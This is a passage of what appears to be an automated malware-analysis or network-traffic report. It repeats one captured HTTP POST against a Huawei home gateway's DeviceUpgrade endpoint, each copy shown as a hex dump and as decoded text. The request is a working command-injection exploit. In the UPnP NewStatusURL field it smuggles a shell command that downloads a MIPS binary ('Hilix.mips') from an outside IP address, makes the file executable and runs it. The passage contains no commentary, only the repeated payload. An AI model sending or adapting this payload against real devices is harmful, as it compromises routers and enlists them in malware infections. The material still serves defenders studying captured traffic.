xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 33 2e 32 34 36 2e 31 32 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.3.246.123 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
